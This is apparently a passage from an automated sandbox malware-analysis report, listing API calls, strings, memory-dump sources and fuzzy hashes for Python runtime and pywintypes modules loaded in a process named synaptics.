                                                                                                                                                                                                                • Part of subcall function 6C0AA3B0: PyErr_Format.PYTHON310(too many arguments (%zi), maximum is %i,?,00000400,?,00000000,00000000,?,?,?,?,?,?,?,?,6C0A5C4F,00000000), ref: 6C0AA3FA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuditErr_FormatParseSys_Tuple
                                                                                                                                                                                                              • String ID: O&O!$ctypes.call_function
                                                                                                                                                                                                              • API String ID: 4151162614-313584727
                                                                                                                                                                                                              • Opcode ID: 600753e44236299b4c985676c5d2f57c91a740415c6262079ab27edf03c7e240
                                                                                                                                                                                                              • Instruction ID: 1dbf983f8e33baf8abcbc7c0e273c0e68f2c5e35c34318170f356407998dd7f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 600753e44236299b4c985676c5d2f57c91a740415c6262079ab27edf03c7e240
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF09035A04108BBDF04DAD49D05BDD7BB9DB01208F200590EE0CA2542EA339B659B95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O&O!,Function_0000A870,?,?), ref: 6C0AAC11
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.call_function,6C0B2794,?,?), ref: 6C0AAC2E
                                                                                                                                                                                                                • Part of subcall function 6C0AA3B0: PyErr_Format.PYTHON310(too many arguments (%zi), maximum is %i,?,00000400,?,00000000,00000000,?,?,?,?,?,?,?,?,6C0A5C4F,00000000), ref: 6C0AA3FA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuditErr_FormatParseSys_Tuple
                                                                                                                                                                                                              • String ID: O&O!$ctypes.call_function
                                                                                                                                                                                                              • API String ID: 4151162614-313584727
                                                                                                                                                                                                              • Opcode ID: 15a5fa117780743a21944fc827f4b39ca68780fea6ae278f2aa645b2f7c0a59c
                                                                                                                                                                                                              • Instruction ID: 1919ffa676253a59a911aeb4532fa717f914230b9d928a743f22f8f51c0ac590
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15a5fa117780743a21944fc827f4b39ca68780fea6ae278f2aa645b2f7c0a59c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F06235A84208BBEF14DAD49D46F9D7BB9DB00708F200590FF0CB65C1E673AA619B99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(00000000,?,00000000,6C0A4943,00000000), ref: 6C0A44C7
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6C0A44D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_MallocMem_Memory
                                                                                                                                                                                                              • String ID: 0bal
                                                                                                                                                                                                              • API String ID: 2673138930-2732478310
                                                                                                                                                                                                              • Opcode ID: 277f16b21aa7599019e763fccb8150ca9a0e85def02b55eee29650de82bc77b2
                                                                                                                                                                                                              • Instruction ID: a8c466701996b9b542cc098e35139e16a99cb8884797a5dbbf2eb61a5fe8e3a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277f16b21aa7599019e763fccb8150ca9a0e85def02b55eee29650de82bc77b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F0A471604B019FD720CFBDF844686B7F5FF44324B058A29E05DC3A91E731E4558B50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsSYSTEMTIME@@YAHPAU_object@@PAU_SYSTEMTIME@@@Z.PYWINTYPES310(?), ref: 6BF4828C
                                                                                                                                                                                                                • Part of subcall function 6BF482E0: PyType_IsSubtype.PYTHON310(?,?,?,6BF481F7,?,?), ref: 6BF482F6
                                                                                                                                                                                                                • Part of subcall function 6BF482E0: PyErr_Format.PYTHON310(6C7E9584,must be a pywintypes time object (got %s),?), ref: 6BF48315
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 6BF4829E
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SystemTimeToFileTime,00000000), ref: 6BF482AE
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatTimeU_object@@$BuildDecodeE@@@Err_ErrorError@@FileLastMessageObject_SizeSubtypeSystemType_Unicode_Value_Win_
                                                                                                                                                                                                              • String ID: SystemTimeToFileTime
                                                                                                                                                                                                              • API String ID: 2439238292-955617467
                                                                                                                                                                                                              • Opcode ID: 2749828b10b59ce047db5b78adb6fc4cf8b18363c4f83f1ecdbd529dfaba2bcc
                                                                                                                                                                                                              • Instruction ID: c1106d88557688bd5d936bd4f091a9b31726b2af54db91c32615c0edca725cdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2749828b10b59ce047db5b78adb6fc4cf8b18363c4f83f1ecdbd529dfaba2bcc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04F068B39246115BD704EF38DC46A5B37D8EF54304F84085DA845C3163F728D60886B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,:CreateGuid), ref: 6BF4A648
                                                                                                                                                                                                              • CoCreateGuid.OLE32(?), ref: 6BF4A66A
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,00000018), ref: 6BF4A685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_CreateGuidParseReferenceSizeTuple_
                                                                                                                                                                                                              • String ID: :CreateGuid
                                                                                                                                                                                                              • API String ID: 2232489080-3559396464
                                                                                                                                                                                                              • Opcode ID: a9222f6903b7cd1bf5c4e408611d7484f2ba568a787d180d714e6735b91f3d62
                                                                                                                                                                                                              • Instruction ID: 13bb88196d477e757db705962e69ef888620c8e9082ade37e832f42ef1745a64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9222f6903b7cd1bf5c4e408611d7484f2ba568a787d180d714e6735b91f3d62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F086729143015BD704EF2C9D06A9E7BE8BF99708F80885DF88992223EA38D55887D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000100), ref: 6BF4535C
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF45374
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6BF45399
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: From$CharStringUnicode_Widewsprintf
                                                                                                                                                                                                              • String ID: IID('%ws')
                                                                                                                                                                                                              • API String ID: 3341265217-2301737843
                                                                                                                                                                                                              • Opcode ID: ef5c33a16d98859ee72a59c125e3fc81510d0853595a909c32e101977568bf78
                                                                                                                                                                                                              • Instruction ID: e6d0df082cc34370a3a198b06b75b792c002727e24323feff68ed962e3078c6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef5c33a16d98859ee72a59c125e3fc81510d0853595a909c32e101977568bf78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C01F4724143019BDB14EB64CC4AFDB77E8EF98308F444918E589C7162EB78E218CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000100), ref: 6BF45235
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF4524D
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6BF45275
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: From$CharStringUnicode_Widewsprintf
                                                                                                                                                                                                              • String ID: IID('%ws')
                                                                                                                                                                                                              • API String ID: 3341265217-2301737843
                                                                                                                                                                                                              • Opcode ID: f4c5fa12f783b75a8f8eb0722d8feb235219f2181816af2c338816cd390ff4ec
                                                                                                                                                                                                              • Instruction ID: 8b2c14d329d358957da3cafdcbe2f5fc67d03b6d3c31b56dbaff3c30155295c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4c5fa12f783b75a8f8eb0722d8feb235219f2181816af2c338816cd390ff4ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3401F4B64143059FD710EB60C849FCB77ECEF98304F448916E68AC7162E774E218CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyCallable_Check.PYTHON310(?), ref: 6C0A498C
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,the errcheck attribute must be callable), ref: 6C0A49A5
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A49C9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • the errcheck attribute must be callable, xrefs: 6C0A499E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Callable_CheckDeallocErr_String
                                                                                                                                                                                                              • String ID: the errcheck attribute must be callable
                                                                                                                                                                                                              • API String ID: 3907376375-3049503998
                                                                                                                                                                                                              • Opcode ID: 5591aba944e9af0e11d844955e22bc0710c1feb8056ecb7521c2b4b6bd6544a6
                                                                                                                                                                                                              • Instruction ID: b04f30a617a6bf7d06b08f21e6dd3bc793df14a02ee037bbda82756d0ed1b49f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5591aba944e9af0e11d844955e22bc0710c1feb8056ecb7521c2b4b6bd6544a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F090B5A06210ABDA049FE8E90499637F8EE01779B100665E92A97652DF32D822868D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48B49
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000,?,?,?,?,?,?,6BF48132,?), ref: 6BF48B59
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48B75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeU_object@@$BuildDecodeE@@@ErrorError@@FileFormatFromLastMessageObject_SizeSystemUnicode_Value_Win_
                                                                                                                                                                                                              • String ID: FileTimeToSystemTime
                                                                                                                                                                                                              • API String ID: 86655538-1754531670
                                                                                                                                                                                                              • Opcode ID: 68638d19088f4ce49c8405364720b5b7835bbd7a4cc0248fae9efb55c7da4573
                                                                                                                                                                                                              • Instruction ID: b630c46054eb6f51890074358be486901d4ea049dd0bc5ca735415782e7b8cd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68638d19088f4ce49c8405364720b5b7835bbd7a4cc0248fae9efb55c7da4573
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3F018B6914201AFD744DF74C85295F7BE8AF99304F40885DE459C7222EA35E5148B93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,6BF59E28), ref: 6BF444CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object_U_object@@
                                                                                                                                                                                                              • String ID: CloseHandle
                                                                                                                                                                                                              • API String ID: 1576115637-2962429428
                                                                                                                                                                                                              • Opcode ID: 2476a6834c64288e13a7dedfcceb8717d3bd766b708e7daa33359ba2d04ece2d
                                                                                                                                                                                                              • Instruction ID: a22d7dd74b84f5c15ceaf80df1ea3ddb0dea9bd5a3c11482c8478b4c4fe981b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2476a6834c64288e13a7dedfcceb8717d3bd766b708e7daa33359ba2d04ece2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF08277E081119BD700DF78F91495A7BA89B10759B0684A4FC08E7232EB39DD018BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<Field type=%s, ofs=%zd:%zd, bits=%zd>,?,?,?,?), ref: 6C0ABD18
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<Field type=%s, ofs=%zd, size=%zd>,?,?), ref: 6C0ABD2C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Field type=%s, ofs=%zd:%zd, bits=%zd>, xrefs: 6C0ABD13
                                                                                                                                                                                                              • <Field type=%s, ofs=%zd, size=%zd>, xrefs: 6C0ABD27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatFromUnicode_
                                                                                                                                                                                                              • String ID: <Field type=%s, ofs=%zd, size=%zd>$<Field type=%s, ofs=%zd:%zd, bits=%zd>
                                                                                                                                                                                                              • API String ID: 3889672380-2914491812
                                                                                                                                                                                                              • Opcode ID: c3cebae52c74a0acb6dc350405a153c74e9860ac5d1e1c0e0468480d9175dcb6
                                                                                                                                                                                                              • Instruction ID: c516b79f6a07e4d134948a355ee2b02e0f5e2cbe18fe04c6c3f8fc75f291f9d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3cebae52c74a0acb6dc350405a153c74e9860ac5d1e1c0e0468480d9175dcb6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EE065B13100146F9608DB8EDC49DF777EDEB846197148459F80D87302D933EC228BB5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __current_exception.VCRUNTIME140 ref: 6BF4D061
                                                                                                                                                                                                              • __current_exception_context.VCRUNTIME140 ref: 6BF4D06B
                                                                                                                                                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF4D072
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2542180945-1018135373
                                                                                                                                                                                                              • Opcode ID: f442c2dfd562c2d24e6be5509037cf56976cd64941db403257fd3e68e4c3b12e
                                                                                                                                                                                                              • Instruction ID: 026d2215a7d020251e78f7e9a63449934941a2b57fc5384e57b8bd6aa2bb90a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f442c2dfd562c2d24e6be5509037cf56976cd64941db403257fd3e68e4c3b12e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F0823B08030D8F8B208E6DA44011DBFECAE112253540C9AD458DB632C768ED92C7D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(?), ref: 6BF47AC5
                                                                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(?,?), ref: 6BF47ADA
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,The index is out of range), ref: 6BF47B03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • The index is out of range, xrefs: 6BF47AFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Authority$CountErr_String
                                                                                                                                                                                                              • String ID: The index is out of range
                                                                                                                                                                                                              • API String ID: 1123653338-505141048
                                                                                                                                                                                                              • Opcode ID: c932b9ea30036436983897fdf5d974f2b5d492befeafc53ea02de7fe15e894fc
                                                                                                                                                                                                              • Instruction ID: f35bc10813aa712a6163326418e129eea24e06f18fcabaf93519293511b5f0ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c932b9ea30036436983897fdf5d974f2b5d492befeafc53ea02de7fe15e894fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF03A35124151DFCB0AEF18D848A69BBF0FF5A302F440498E89583236E735A928DB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 6BF48848
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000), ref: 6BF48858
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?), ref: 6BF48874
                                                                                                                                                                                                              Strings
